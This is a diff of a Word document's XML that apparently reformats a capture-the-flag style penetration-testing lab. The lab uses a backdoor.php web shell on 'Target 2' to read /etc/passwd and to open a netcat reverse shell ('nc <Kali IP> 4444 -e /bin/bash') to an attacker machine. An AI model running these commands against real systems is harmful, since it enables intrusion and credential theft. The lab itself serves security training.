-        <w:t xml:space="preserve">      - For example, try: `http://&lt;Target 2 URL&gt;/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>backdoor.php?cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=cat%20/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/passwd`</w:t>
+        <w:t xml:space="preserve">      - For example, try: `http://&lt;Target 2 URL&gt;/backdoor.php?cmd=cat%20/etc/passwd`</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1287,52 +1197,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">      - On your **Kali** VM, start a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netcat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> listener: `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lnvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 4444`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">      - In the browser, use the backdoor to run: `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> &lt;Kali IP&gt; 4444 -e /bin/bash`. For example, your query string will look like `</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>cmd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=nc%20&lt;Kali IP&gt;%204444%20-e%20/bin/bash`.</w:t>
+        <w:t xml:space="preserve">      - On your **Kali** VM, start a netcat listener: `nc -lnvp 4444`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">      - In the browser, use the backdoor to run: `nc &lt;Kali IP&gt; 4444 -e /bin/bash`. For example, your query string will look like `cmd=nc%20&lt;Kali IP&gt;%204444%20-e%20/bin/bash`.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1349,29 +1219,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">    - **Hint**: Use the `find` command: `find /var/www -type f -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>iname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 'flag*'`</w:t>
+        <w:t xml:space="preserve">    - **Hint**: Use the `find` command: `find /var/www -type f -iname 'flag*'`</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">9. If you find all three flags -- congratulations! There is a </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>fourth, but</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> escalating to `root` is extremely difficult: For now, move on to completing a report about Target 2.</w:t>
+        <w:t>9. If you find all three flags -- congratulations! There is a fourth, but escalating to `root` is extremely difficult: For now, move on to completing a report about Target 2.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -1507,6 +1361,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -1553,8 +1408,10 @@
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
